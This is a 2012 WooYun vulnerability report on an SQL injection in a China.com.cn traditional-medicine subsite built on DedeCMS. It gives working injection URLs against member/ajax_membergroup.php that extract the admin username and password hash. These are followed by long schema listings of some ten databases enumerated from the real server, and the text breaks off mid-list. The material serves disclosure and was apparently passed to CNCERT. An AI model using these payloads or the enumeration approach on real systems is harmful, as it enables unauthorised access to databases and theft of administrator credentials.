中国网分站SQL注入 | wooyun-2012-09298| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-09298

漏洞标题：中国网分站SQL注入

漏洞作者： zhk

提交时间：2012-07-06 18:44

修复时间：2012-08-20 18:45

公开时间：2012-08-20 18:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-07-06：细节已通知厂商并且等待厂商处理中
2012-07-11：厂商已经确认，细节仅向厂商公开
2012-07-21：细节向核心白帽子及相关领域专家公开
2012-07-31：细节向普通白帽子公开
2012-08-10：细节向实习白帽子公开
2012-08-20：细节向公众公开
简要描述：

中国网分站SQL注入,权限不小的
是从http://www.wooyun.org/bugs/wooyun-2010-09101看到的，那里RANK1应该是不可能的
详细说明：

主要是dedecms的漏洞
http://zy.china.com.cn/
http://zy.china.com.cn/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
21232f297a57a5a743894a0e4a801f=>admin
http://zy.china.com.cn/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
7b1+4ec5112b985e5f19+6=>?
漏洞证明：

Database: tcmblog                                                                                                                                    
[26 tables]
+----------------------------------------------+
| tcm_2_commentmeta                            |
| tcm_2_comments                               |
| tcm_2_links                                  |
| tcm_2_options                                |
| tcm_2_postmeta                               |
| tcm_2_posts                                  |
| tcm_2_term_relationships                     |
| tcm_2_term_taxonomy                          |
| tcm_2_terms                                  |
| tcm_blog_versions                            |
| tcm_blogs                                    |
| tcm_commentmeta                              |
| tcm_comments                                 |
| tcm_links                                    |
| tcm_options                                  |
| tcm_postmeta                                 |
| tcm_posts                                    |
| tcm_registration_log                         |
| tcm_signups                                  |
| tcm_site                                     |
| tcm_sitemeta                                 |
| tcm_term_relationships                       |
| tcm_term_taxonomy                            |
| tcm_terms                                    |
| tcm_usermeta                                 |
| tcm_users                                    |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: UnionDb
[66 tables]
+----------------------------------------------+
| zgzy_account_preference_assoc                |
| zgzy_account_user_assoc                      |
| zgzy_account_user_permission_assoc           |
| zgzy_accounts                                |
| zgzy_acls                                    |
| zgzy_acls_channel                            |
| zgzy_ad_category_assoc                       |
| zgzy_ad_zone_assoc                           |
| zgzy_affiliates                              |
| zgzy_affiliates_extra                        |
| zgzy_agency                                  |
| zgzy_application_variable                    |
| zgzy_audit                                   |
| zgzy_banner_vast_element                     |
| zgzy_banners                                 |
| zgzy_campaigns                               |
| zgzy_campaigns_trackers                      |
| zgzy_category                                |
| zgzy_channel                                 |
| zgzy_clients                                 |
| zgzy_data_bkt_a                              |
| zgzy_data_bkt_a_var                          |
| zgzy_data_bkt_c                              |
| zgzy_data_bkt_m                              |
| zgzy_data_bkt_r                              |
| zgzy_data_bkt_vast_e                         |
| zgzy_data_intermediate_ad                    |
| zgzy_data_intermediate_ad_connection         |
| zgzy_data_intermediate_ad_variable_value     |
| zgzy_data_raw_ad_click                       |
| zgzy_data_raw_ad_impression                  |
| zgzy_data_raw_ad_request                     |
| zgzy_data_raw_tracker_impression             |
| zgzy_data_raw_tracker_variable_value         |
| zgzy_data_summary_ad_hourly                  |
| zgzy_data_summary_ad_zone_assoc              |
| zgzy_data_summary_channel_daily              |
| zgzy_data_summary_zone_impression_history    |
| zgzy_database_action                         |
| zgzy_ext_market_advertiser                   |
| zgzy_ext_market_assoc_data                   |
| zgzy_ext_market_campaign_pref                |
| zgzy_ext_market_general_pref                 |
| zgzy_ext_market_plugin_variable              |
| zgzy_ext_market_setting                      |
| zgzy_ext_market_stats                        |
| zgzy_ext_market_web_stats                    |
| zgzy_ext_market_website_pref                 |
| zgzy_images                                  |
| zgzy_log_maintenance_forecasting             |
| zgzy_log_maintenance_priority                |
| zgzy_log_maintenance_statistics              |
| zgzy_password_recovery                       |
| zgzy_placement_zone_assoc                    |
| zgzy_preferences                             |
| zgzy_session                                 |
| zgzy_stats_vast                              |
| zgzy_targetstats                             |
| zgzy_tracker_append                          |
| zgzy_trackers                                |
| zgzy_upgrade_action                          |
| zgzy_userlog                                 |
| zgzy_users                                   |
| zgzy_variable_publisher                      |
| zgzy_variables                               |
| zgzy_zones                                   |
+----------------------------------------------+
Database: chntcm_blog
[60 tables]
+----------------------------------------------+
| tcm_16_commentmeta                           |
| tcm_16_comments                              |
| tcm_16_links                                 |
| tcm_16_options                               |
| tcm_16_postmeta                              |
| tcm_16_posts                                 |
| tcm_16_term_relationships                    |
| tcm_16_term_taxonomy                         |
| tcm_16_terms                                 |
| tcm_2_commentmeta                            |
| tcm_2_comments                               |
| tcm_2_links                                  |
| tcm_2_options                                |
| tcm_2_postmeta                               |
| tcm_2_posts                                  |
| tcm_2_term_relationships                     |
| tcm_2_term_taxonomy                          |
| tcm_2_terms                                  |
| tcm_3_commentmeta                            |
| tcm_3_comments                               |
| tcm_3_links                                  |
| tcm_3_options                                |
| tcm_3_postmeta                               |
| tcm_3_posts                                  |
| tcm_3_term_relationships                     |
| tcm_3_term_taxonomy                          |
| tcm_3_terms                                  |
| tcm_blog_versions                            |
| tcm_blogs                                    |
| tcm_bp_activity                              |
| tcm_bp_activity_meta                         |
| tcm_bp_friends                               |
| tcm_bp_groups                                |
| tcm_bp_groups_groupmeta                      |
| tcm_bp_groups_members                        |
| tcm_bp_messages_messages                     |
| tcm_bp_messages_notices                      |
| tcm_bp_messages_recipients                   |
| tcm_bp_notifications                         |
| tcm_bp_user_blogs                            |
| tcm_bp_user_blogs_blogmeta                   |
| tcm_bp_xprofile_data                         |
| tcm_bp_xprofile_fields                       |
| tcm_bp_xprofile_groups                       |
| tcm_bp_xprofile_meta                         |
| tcm_commentmeta                              |
| tcm_comments                                 |
| tcm_links                                    |
| tcm_options                                  |
| tcm_postmeta                                 |
| tcm_posts                                    |
| tcm_registration_log                         |
| tcm_signups                                  |
| tcm_site                                     |
| tcm_sitemeta                                 |
| tcm_term_relationships                       |
| tcm_term_taxonomy                            |
| tcm_terms                                    |
| tcm_usermeta                                 |
| tcm_users                                    |
+----------------------------------------------+
Database: baokuzgzy
[121 tables]
+----------------------------------------------+
| baoku_acupoint                               |
| baoku_addonarticle                           |
| baoku_addonimages                            |
| baoku_addonrecipe                            |
| baoku_addonshop                              |
| baoku_addonsoft                              |
| baoku_addonspec                              |
| baoku_admin                                  |
| baoku_admintype                              |
| baoku_advancedsearch                         |
| baoku_arcatt                                 |
| baoku_arccache                               |
| baoku_archives                               |
| baoku_arcmulti                               |
| baoku_arcrank                                |
| baoku_arctiny                                |
| baoku_arctype                                |
| baoku_area                                   |
| baoku_book_user                              |
| baoku_channeltype                            |
| baoku_co_htmls                               |
| baoku_co_mediaurls                           |
| baoku_co_note                                |
| baoku_co_onepage                             |
| baoku_co_urls                                |
| baoku_diyforms                               |
| baoku_downloads                              |
| baoku_drug_msg                               |
| baoku_erradd                                 |
| baoku_fangjiattach                           |
| baoku_feedback                               |
| baoku_flink                                  |
| baoku_flinktype                              |
| baoku_freelist                               |
| baoku_homepageset                            |
| baoku_humanbody                              |
| baoku_jingluo                                |
| baoku_jsym                                   |
| baoku_keywords                               |
| baoku_log                                    |
| baoku_member                                 |
| baoku_member_company                         |
| baoku_member_feed                            |
| baoku_member_flink                           |
| baoku_member_friends                         |
| baoku_member_group                           |
| baoku_member_guestbook                       |
| baoku_member_model                           |
| baoku_member_msg                             |
| baoku_member_operation                       |
| baoku_member_person                          |
| baoku_member_pms                             |
| baoku_member_snsmsg                          |
| baoku_member_space                           |
| baoku_member_stow                            |
| baoku_member_stowtype                        |
| baoku_member_tj                              |
| baoku_member_type                            |
| baoku_member_vhistory                        |
| baoku_moneycard_record                       |
| baoku_moneycard_type                         |
| baoku_mtypes                                 |
| baoku_multiserv_config                       |
| baoku_myad                                   |
| baoku_mytag                                  |
| baoku_plus                                   |
| baoku_pwd_tmp                                |
| baoku_ratings                                |
| baoku_records                                |
| baoku_scores                                 |
| baoku_search_cache                           |
| baoku_search_keywords                        |
| baoku_sgpage                                 |
| baoku_shops_delivery                         |
| baoku_shops_orders                           |
| baoku_shops_products                         |
| baoku_shops_userinfo                         |
| baoku_softconfig                             |
| baoku_stepselect                             |
| baoku_sys_enum                               |
| baoku_sys_module                             |
| baoku_sys_set                                |
| baoku_sys_task                               |
| baoku_sysconfig                              |
| baoku_tagindex                               |
| baoku_taglist                                |
| baoku_tuinashoufa                            |
| baoku_uploads                                |
| baoku_verifies                               |
| baoku_vote                                   |
| baoku_yaocai                                 |
| baoku_yaoqi                                  |
| baoku_yaoqi_agency                           |
| baoku_yaoqi_brand                            |
| baoku_yaoqi_msg                              |
| baoku_yaoqi_product                          |
| baoku_yian                                   |
| baoku_yibook                                 |
| baoku_yibookcontent                          |
| baoku_yibookindex                            |
| baoku_yimingci                               |
| baoku_zhenjiujifa                            |
| baokuarticle_sphinx                          |
| book_sphinx                                  |
| dengji                                       |
| doctor                                       |
| doctor_sphinx                                |
| fangji_sphinx                                |
| guji_sphinx                                  |
| hospital                                     |
| hospital_sphinx                              |
| hospitalkeshi_sphinx                         |
| keshi                                        |
| keywords_sphinx                              |
| mytable                                      |
| region                                       |
| shuyu                                        |
| shuyu2                                       |
| shuyu_sphinx                                 |
| yaocai_sphinx                                |
| yimingci_sphinx                              |
+----------------------------------------------+
Database: 1321zgzy0829
[411 tables]
+----------------------------------------------+
| NewTable                                     |
| article_sphinx                               |
| ask_sphinx                                   |
| autokeywordslink_sphinx                      |
| bbs_access                                   |
| bbs_activities                               |
| bbs_activityapplies                          |
| bbs_addons                                   |
| bbs_adminactions                             |
| bbs_admincustom                              |
| bbs_admingroups                              |
| bbs_adminnotes                               |
| bbs_adminsessions                            |
| bbs_advertisements                           |
| bbs_announcements                            |
| bbs_attachmentfields                         |
| bbs_attachments                              |
| bbs_attachpaymentlog                         |
| bbs_attachtypes                              |
| bbs_banned                                   |
| bbs_bbcodes                                  |
| bbs_caches                                   |
| bbs_creditslog                               |
| bbs_crons                                    |
| bbs_debateposts                              |
| bbs_debates                                  |
| bbs_failedlogins                             |
| bbs_faqs                                     |
| bbs_favoriteforums                           |
| bbs_favorites                                |
| bbs_favoritethreads                          |
| bbs_feeds                                    |
| bbs_forumfields                              |
| bbs_forumlinks                               |
| bbs_forumrecommend                           |
| bbs_forums                                   |
| bbs_imagetypes                               |
| bbs_invites                                  |
| bbs_itempool                                 |
| bbs_magiclog                                 |
| bbs_magicmarket                              |
| bbs_magics                                   |
| bbs_medallog                                 |
| bbs_medals                                   |
| bbs_memberfields                             |
| bbs_membermagics                             |
| bbs_memberrecommend                          |
| bbs_members                                  |
| bbs_memberspaces                             |
| bbs_moderators                               |
| bbs_modworks                                 |
| bbs_mytasks                                  |
| bbs_navs                                     |
| bbs_onlinelist                               |
| bbs_onlinetime                               |
| bbs_orders                                   |
| bbs_paymentlog                               |
| bbs_pic                                      |
| bbs_pic_copy                                 |
| bbs_pluginhooks                              |
| bbs_plugins                                  |
| bbs_pluginvars                               |
| bbs_plusin_comments                          |
| bbs_plusin_dfvote_tp                         |
| bbs_plusin_dfvote_xs                         |
| bbs_polloptions                              |
| bbs_polls                                    |
| bbs_postposition                             |
| bbs_posts                                    |
| bbs_profilefields                            |
| bbs_projects                                 |
| bbs_promotions                               |
| bbs_prompt                                   |
| bbs_promptmsgs                               |
| bbs_prompttype                               |
| bbs_ranks                                    |
| bbs_ratelog                                  |
| bbs_regips                                   |
| bbs_relatedthreads                           |
| bbs_reportlog                                |
| bbs_request                                  |
| bbs_rewardlog                                |
| bbs_rsscaches                                |
| bbs_searchindex                              |
| bbs_sessions                                 |
| bbs_settings                                 |
| bbs_smilies                                  |
| bbs_spacecaches                              |
| bbs_stats                                    |
| bbs_statvars                                 |
| bbs_styles                                   |
| bbs_stylevars                                |
| bbs_tags                                     |
| bbs_tasks                                    |
| bbs_taskvars                                 |
| bbs_templates                                |
| bbs_threads                                  |
| bbs_threadsmod                               |
| bbs_threadtags                               |
| bbs_threadtypes                              |
| bbs_tradecomments                            |
| bbs_tradelog                                 |
| bbs_tradeoptionvars                          |
| bbs_trades                                   |
| bbs_tuijian                                  |
| bbs_typemodels                               |
| bbs_typeoptions                              |
| bbs_typeoptionvars                           |
| bbs_typevars                                 |
| bbs_usergroups                               |
| bbs_validating                               |
| bbs_warnings                                 |
| bbs_words                                    |
| bbsposts_sphinx                              |
| dengji                                       |
| doctor                                       |
| hb_addonarticle                              |
| hb_addondisease                              |
| hb_addonimages                               |
| hb_addoninfos                                |
| hb_addonshop                                 |
| hb_addonsoft                                 |
| hb_addonspec                                 |
| hb_admin                                     |
| hb_admintype                                 |
| hb_advancedsearch                            |
| hb_arcatt                                    |
| hb_arccache                                  |
| hb_archives                                  |
| hb_arcmulti                                  |
| hb_arcrank                                   |
| hb_arctiny                                   |
| hb_arctype                                   |
| hb_area                                      |
| hb_channeltype                               |
| hb_co_htmls                                  |
| hb_co_mediaurls                              |
| hb_co_note                                   |
| hb_co_onepage                                |
| hb_co_urls                                   |
| hb_diyforms                                  |
| hb_downloads                                 |
| hb_erradd                                    |
| hb_feedback                                  |
| hb_flink                                     |
| hb_flinktype                                 |
| hb_freelist                                  |
| hb_homepageset                               |
| hb_keywords                                  |
| hb_log                                       |
| hb_member                                    |
| hb_member_company                            |
| hb_member_feed                               |
| hb_member_flink                              |
| hb_member_friends                            |
| hb_member_group                              |
| hb_member_guestbook                          |
| hb_member_model                              |
| hb_member_msg                                |
| hb_member_operation                          |
| hb_member_person                             |
| hb_member_pms                                |
| hb_member_snsmsg                             |
| hb_member_space                              |
| hb_member_stow                               |
| hb_member_stowtype                           |
| hb_member_tj                                 |
| hb_member_type                               |
| hb_member_vhistory                           |
| hb_moneycard_record                          |
| hb_moneycard_type                            |
| hb_mtypes                                    |
| hb_multiserv_config                          |
| hb_myad                                      |
| hb_mytag                                     |
| hb_plus                                      |
| hb_pwd_tmp                                   |
| hb_ratings                                   |
| hb_scores                                    |
| hb_search_cache                              |
| hb_search_keywords                           |
| hb_sgpage                                    |
| hb_shops_delivery                            |
| hb_shops_orders                              |
| hb_shops_products                            |
| hb_shops_userinfo                            |
| hb_softconfig                                |
| hb_stepselect                                |
| hb_sys_enum                                  |
| hb_sys_module                                |
| hb_sys_set                                   |
| hb_sys_task                                  |
| hb_sysconfig                                 |
| hb_tagindex                                  |
| hb_taglist                                   |
| hb_uploads                                   |
| hb_verifies                                  |
| hb_vote                                      |
| hospital                                     |
| ip_data                                      |
| jk_addonarticle                              |
| jk_addonimages                               |
| jk_addoninfos                                |
| jk_addonshop                                 |
| jk_addonsoft                                 |
| jk_addonspec                                 |
| jk_admin                                     |
| jk_admintype                                 |
| jk_advancedsearch                            |
| jk_arcatt                                    |
| jk_arccache                                  |
| jk_archives                                  |
| jk_arcmulti                                  |
| jk_arcrank                                   |
| jk_arctiny                                   |
| jk_arctype                                   |
| jk_area                                      |
| jk_channeltype                               |
| jk_co_htmls                                  |
| jk_co_mediaurls                              |
| jk_co_note                                   |
| jk_co_onepage                                |
| jk_co_urls                                   |
| jk_diyforms                                  |
| jk_downloads                                 |
| jk_erradd                                    |
| jk_feedback                                  |
| jk_flink                                     |
| jk_flinktype                                 |
| jk_freelist                                  |
| jk_homepageset                               |
| jk_keywords                                  |
| jk_log                                       |
| jk_member                                    |
| jk_member_company                            |
| jk_member_feed                               |
| jk_member_flink                              |
| jk_member_friends                            |
| jk_member_group                              |
| jk_member_guestbook                          |
| jk_member_model                              |
| jk_member_msg                                |
| jk_member_operation                          |
| jk_member_person                             |
| jk_member_pms                                |
| jk_member_snsmsg                             |
| jk_member_space                              |
| jk_member_stow                               |
| jk_member_stowtype                           |
| jk_member_tj                                 |
| jk_member_type                               |
| jk_member_vhistory                           |
| jk_moneycard_record                          |
| jk_moneycard_type                            |
| jk_mtypes                                    |
| jk_multiserv_config                          |
| jk_myad                                      |
| jk_mytag                                     |
| jk_plus                                      |
| jk_pwd_tmp                                   |
| jk_scores                                    |
| jk_search_cache                              |
| jk_search_keywords                           |
| jk_sgpage                                    |
| jk_shops_delivery                            |
| jk_shops_orders                              |
| jk_shops_products                            |
| jk_shops_userinfo                            |
| jk_softconfig                                |
| jk_stepselect                                |
| jk_sys_enum                                  |
| jk_sys_module                                |
| jk_sys_set                                   |
| jk_sys_task                                  |
| jk_sysconfig                                 |
| jk_tagindex                                  |
| jk_taglist                                   |
| jk_uploads                                   |
| jk_verifies                                  |
| jk_vote                                      |
| keshi                                        |
| keywords_sphinx                              |
| keywordslink_sphinx                          |
| shuyu                                        |
| shuyu2                                       |
| tagindex_sphinx                              |
| uc_admins                                    |
| uc_applications                              |
| uc_badwords                                  |
| uc_domains                                   |
| uc_failedlogins                              |
| uc_feeds                                     |
| uc_friends                                   |
| uc_mailqueue                                 |
| uc_memberfields                              |
| uc_members                                   |
| uc_mergemembers                              |
| uc_newpm                                     |
| uc_notelist                                  |
| uc_pms                                       |
| uc_protectedmembers                          |
| uc_settings                                  |
| uc_sqlcache                                  |
| uc_tags                                      |
| uc_vars                                      |
| zhongqiu_vote                                |
| zyzy_addon17                                 |
| zyzy_addonarticle                            |
| zyzy_addonarticle19                          |
| zyzy_addonimages                             |
| zyzy_addoninfos                              |
| zyzy_addonshop                               |
| zyzy_addonsoft                               |
| zyzy_addonspec                               |
| zyzy_admin                                   |
| zyzy_admintype                               |
| zyzy_advancedsearch                          |
| zyzy_arcatt                                  |
| zyzy_arccache                                |
| zyzy_archives                                |
| zyzy_arcmulti                                |
| zyzy_arcrank                                 |
| zyzy_arctiny                                 |
| zyzy_arctype                                 |
| zyzy_area                                    |
| zyzy_ask                                     |
| zyzy_askanswer                               |
| zyzy_askbrand                                |
| zyzy_askcreditdetail                         |
| zyzy_askexpert                               |
| zyzy_askgenius                               |
| zyzy_askrank                                 |
| zyzy_askstatic                               |
| zyzy_asktype                                 |
| zyzy_askvote                                 |
| zyzy_channeltype                             |
| zyzy_co_htmls                                |
| zyzy_co_mediaurls                            |
| zyzy_co_note                                 |
| zyzy_co_onepage                              |
| zyzy_co_urls                                 |
| zyzy_collect                                 |
| zyzy_diyforms                                |
| zyzy_downloads                               |
| zyzy_erradd                                  |
| zyzy_favorite                                |
| zyzy_feedback                                |
| zyzy_flink                                   |
| zyzy_flinktype                               |
| zyzy_freelist                                |
| zyzy_homepageset                             |
| zyzy_keywords                                |
| zyzy_log                                     |
| zyzy_member                                  |
| zyzy_member_company                          |
| zyzy_member_experience                       |
| zyzy_member_feed                             |
| zyzy_member_flink                            |
| zyzy_member_friends                          |
| zyzy_member_group                            |
| zyzy_member_guestbook                        |
| zyzy_member_model                            |
| zyzy_member_msg                              |
| zyzy_member_operation                        |
| zyzy_member_person                           |
| zyzy_member_person3                          |
| zyzy_member_pms                              |
| zyzy_member_snsmsg                           |
| zyzy_member_space                            |
| zyzy_member_stow                             |
| zyzy_member_stowtype                         |
| zyzy_member_tj                               |
| zyzy_member_type                             |
| zyzy_member_vhistory                         |
| zyzy_moneycard_record                        |
| zyzy_moneycard_type                          |
| zyzy_mood                                    |
| zyzy_mood_ranking                            |
| zyzy_mtypes                                  |
| zyzy_multiserv_config                        |
| zyzy_myad                                    |
| zyzy_mytag                                   |
| zyzy_plus                                    |
| zyzy_publication                             |
| zyzy_pwd_tmp                                 |
| zyzy_ratings                                 |
| zyzy_scores                                  |
| zyzy_search_cache                            |
| zyzy_search_keywords                         |
| zyzy_sgpage                                  |
| zyzy_shops_delivery                          |
| zyzy_shops_orders                            |
| zyzy_shops_products                          |
| zyzy_shops_userinfo                          |
| zyzy_softconfig                              |
| zyzy_stepselect                              |
| zyzy_sys_enum                                |
| zyzy_sys_module                              |
| zyzy_sys_set                                 |
| zyzy_sys_task                                |
| zyzy_sysconfig                               |
| zyzy_tagindex                                |
| zyzy_taglist                                 |
| zyzy_uploads                                 |
| zyzy_verifies                                |
| zyzy_vote                                    |
| zyzy_yjfk                                    |
| zyzy_zt_comment                              |
| zyzy_zymj                                    |
| zyzy_zymy                                    |
| zyzy_zysp                                    |
+----------------------------------------------+
Database: weibo_zgzy
[58 tables]
+----------------------------------------------+
| zgzy_account_proxy                           |
| zgzy_ad                                      |
| zgzy_admin                                   |
| zgzy_admin_group                             |
| zgzy_celeb                                   |
| zgzy_celeb_category                          |
| zgzy_comment_copy                            |
| zgzy_comment_delete                          |
| zgzy_comment_verify                          |
| zgzy_component_cfg                           |
| zgzy_component_topic                         |
| zgzy_component_topiclist                     |
| zgzy_component_usergroups                    |
| zgzy_component_users                         |
| zgzy_components                              |
| zgzy_content_unit                            |
| zgzy_disable_items                           |
| zgzy_event_comment                           |
| zgzy_event_join                              |
| zgzy_events                                  |
| zgzy_feedback                                |
| zgzy_interview_wb                            |
| zgzy_interview_wb_atme                       |
| zgzy_item_groups                             |
| zgzy_keep_userdomain                         |
| zgzy_log_error                               |
| zgzy_log_error_api                           |
| zgzy_log_http                                |
| zgzy_log_info                                |
| zgzy_log_info_api                            |
| zgzy_micro_interview                         |
| zgzy_micro_live                              |
| zgzy_micro_live_wb                           |
| zgzy_nav                                     |
| zgzy_notice                                  |
| zgzy_notice_recipients                       |
| zgzy_page_manager                            |
| zgzy_page_prototype                          |
| zgzy_pages                                   |
| zgzy_plugins                                 |
| zgzy_profile_ad                              |
| zgzy_sessions                                |
| zgzy_skin_groups                             |
| zgzy_skins                                   |
| zgzy_subject                                 |
| zgzy_sys_config                              |
| zgzy_today_topics                            |
| zgzy_user_action                             |
| zgzy_user_ban                                |
| zgzy_user_config                             |
| zgzy_user_focus                              |
| zgzy_user_follow                             |
| zgzy_user_follow_copy                        |
| zgzy_user_verify                             |
| zgzy_users                                   |
| zgzy_weibo_copy                              |
| zgzy_weibo_delete                            |
| zgzy_weibo_verify                            |
+----------------------------------------------+
Database: tcmcmall
[89 tables]
+----------------------------------------------+
| tcmchina_account_log                         |
| tcmchina_ad                                  |
| tcmchina_ad_custom                           |
| tcmchina_ad_position                         |
| tcmchina_admin_action                        |
| tcmchina_admin_log                           |
| tcmchina_admin_message                       |
| tcmchina_admin_user                          |
| tcmchina_adsense                             |
| tcmchina_affiliate_log                       |
| tcmchina_agency                              |
| tcmchina_area_region                         |
| tcmchina_article                             |
| tcmchina_article_cat                         |
| tcmchina_attribute                           |
| tcmchina_auction_log                         |
| tcmchina_auto_manage                         |
| tcmchina_back_goods                          |
| tcmchina_back_order                          |
| tcmchina_bonus_type                          |
| tcmchina_booking_goods                       |
| tcmchina_brand                               |
| tcmchina_card                                |
| tcmchina_cart                                |
| tcmchina_cat_recommend                       |
| tcmchina_category                            |
| tcmchina_collect_goods                       |
| tcmchina_comment                             |
| tcmchina_crons                               |
| tcmchina_delivery_goods                      |
| tcmchina_delivery_order                      |
| tcmchina_email_list                          |
| tcmchina_email_sendlist                      |
| tcmchina_error_log                           |
| tcmchina_exchange_goods                      |
| tcmchina_favourable_activity                 |
| tcmchina_feedback                            |
| tcmchina_friend_link                         |
| tcmchina_goods                               |
| tcmchina_goods_activity                      |
| tcmchina_goods_article                       |
| tcmchina_goods_attr                          |
| tcmchina_goods_cat                           |
| tcmchina_goods_gallery                       |
| tcmchina_goods_type                          |
| tcmchina_group_goods                         |
| tcmchina_keywords                            |
| tcmchina_link_goods                          |
| tcmchina_mail_templates                      |
| tcmchina_member_price                        |
| tcmchina_nav                                 |
| tcmchina_order_action                        |
| tcmchina_order_goods                         |
| tcmchina_order_info                          |
| tcmchina_pack                                |
| tcmchina_package_goods                       |
| tcmchina_pay_log                             |
| tcmchina_payment                             |
| tcmchina_plugins                             |
| tcmchina_products                            |
| tcmchina_reg_extend_info                     |
| tcmchina_reg_fields                          |
| tcmchina_region                              |
| tcmchina_role                                |
| tcmchina_searchengine                        |
| tcmchina_sessions                            |
| tcmchina_sessions_data                       |
| tcmchina_shipping                            |
| tcmchina_shipping_area                       |
| tcmchina_shop_config                         |
| tcmchina_snatch_log                          |
| tcmchina_stats                               |
| tcmchina_suppliers                           |
| tcmchina_tag                                 |
| tcmchina_template                            |
| tcmchina_topic                               |
| tcmchina_user_account                        |
| tcmchina_user_address                        |
| tcmchina_user_bonus                          |
| tcmchina_user_feed                           |
| tcmchina_user_rank                           |
| tcmchina_users                               |
| tcmchina_virtual_card                        |
| tcmchina_volume_price                        |
| tcmchina_vote                                |
| tcmchina_vote_log                            |
| tcmchina_vote_option                         |
| tcmchina_wholesale                           |
| tcmchina_youyong                             |
+----------------------------------------------+
Database: zgzyhbdb
[164 tables]
+----------------------------------------------+
| hb_addonarticle                              |
| hb_addondisease                              |
| hb_addonimages                               |
| hb_addoninfos                                |
| hb_addonshop                                 |
| hb_addonsoft                                 |
| hb_addonspec                                 |
| hb_admin                                     |
| hb_admintype                                 |
| hb_advancedsearch                            |
| hb_arcatt                                    |
| hb_arccache                                  |
| hb_archives                                  |
| hb_arcmulti                                  |
| hb_arcrank                                   |
| hb_arctiny                                   |
| hb_arctype                                   |
| hb_area                                      |
| hb_channeltype                               |
| hb_co_htmls                                  |
| hb_co_mediaurls                              |
| hb_co_note                                   |
| hb_co_onepage                                |
| hb_co_urls                                   |
| hb_diyforms                                  |
| hb_downloads                                 |
| hb_erradd                                    |
| hb_feedback                                  |
| hb_flink                                     |
| hb_flinktype                                 |
| hb_freelist                                  |
| hb_homepageset                               |
| hb_keywords                                  |
| hb_log                                       |
| hb_member                                    |
| hb_member_company                            |
| hb_member_feed                               |
| hb_member_flink                              |
| hb_member_friends                            |
| hb_member_group                              |
| hb_member_guestbook                          |
| hb_member_model                              |
| hb_member_msg                                |
| hb_member_operation                          |
| hb_member_person                             |
| hb_member_pms                                |
| hb_member_snsmsg                             |
| hb_member_space                              |
| hb_member_stow                               |
| hb_member_stowtype                           |
| hb_member_tj                                 |
| hb_member_type                               |
| hb_member_vhistory                           |
| hb_moneycard_record                          |
| hb_moneycard_type                            |
| hb_mtypes                                    |
| hb_multiserv_config                          |
| hb_myad                                      |
| hb_mytag                                     |
| hb_plus                                      |
| hb_pwd_tmp                                   |
| hb_ratings                                   |
| hb_scores                                    |
| hb_search_cache                              |
| hb_search_keywords                           |
| hb_sgpage                                    |
| hb_shops_delivery                            |
| hb_shops_orders                              |
| hb_shops_products                            |
| hb_shops_userinfo                            |
| hb_softconfig                                |
| hb_stepselect                                |
| hb_sys_enum                                  |
| hb_sys_module                                |
| hb_sys_set                                   |
| hb_sys_task                                  |
| hb_sysconfig                                 |
| hb_tagindex                                  |
| hb_taglist                                   |
| hb_uploads                                   |
| hb_verifies                                  |
| hb_vote                                      |
| shx_addonarticle                             |
| shx_addonimages                              |
| shx_addoninfos                               |
| shx_addonshop                                |
| shx_addonsoft                                |
| shx_addonspec                                |
| shx_admin                                    |
| shx_admintype                                |
| shx_advancedsearch                           |
| shx_arcatt                                   |
| shx_arccache                                 |
| shx_archives                                 |
| shx_arcmulti                                 |
| shx_arcrank                                  |
| shx_arctiny                                  |
| shx_arctype                                  |
| shx_area                                     |
| shx_channeltype                              |
| shx_co_htmls                                 |
| shx_co_mediaurls                             |
| shx_co_note                                  |
| shx_co_onepage                               |
| shx_co_urls                                  |
| shx_diyforms                                 |
| shx_downloads                                |
| shx_erradd                                   |
| shx_feedback                                 |
| shx_flink                                    |
| shx_flinktype                                |
| shx_freelist                                 |
| shx_homepageset                              |
| shx_keywords                                 |
| shx_log                                      |
| shx_member                                   |
| shx_member_company                           |
| shx_member_feed                              |
| shx_member_flink                             |
| shx_member_friends                           |
| shx_member_group                             |
| shx_member_guestbook                         |
| shx_member_model                             |
| shx_member_msg                               |
| shx_member_operation                         |
| shx_member_person                            |
| shx_member_pms                               |
| shx_member_snsmsg                            |
| shx_member_space                             |
| shx_member_stow                              |
| shx_member_stowtype                          |
| shx_member_tj                                |
| shx_member_type                              |
| shx_member_vhistory                          |
| shx_moneycard_record                         |
| shx_moneycard_type                           |
| shx_mtypes                                   |
| shx_multiserv_config                         |
| shx_myad                                     |
| shx_mytag                                    |
| shx_payment                                  |
| shx_plus                                     |
| shx_pwd_tmp                                  |
| shx_ratings                                  |
| shx_scores                                   |
| shx_search_cache                             |
| shx_search_keywords                          |
| shx_sgpage                                   |
| shx_shops_delivery                           |
| shx_shops_orders                             |
| shx_shops_products                           |
| shx_shops_userinfo                           |
| shx_softconfig                               |
| shx_stepselect                               |
| shx_sys_enum                                 |
| shx_sys_module                               |
| shx_sys_set                                  |
| shx_sys_task                                 |
| shx_sysconfig                                |
| shx_tagindex                                 |
| shx_taglist                                  |
| shx_uploads                                  |
| shx_verifies                                 |
| shx_vote                                     |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
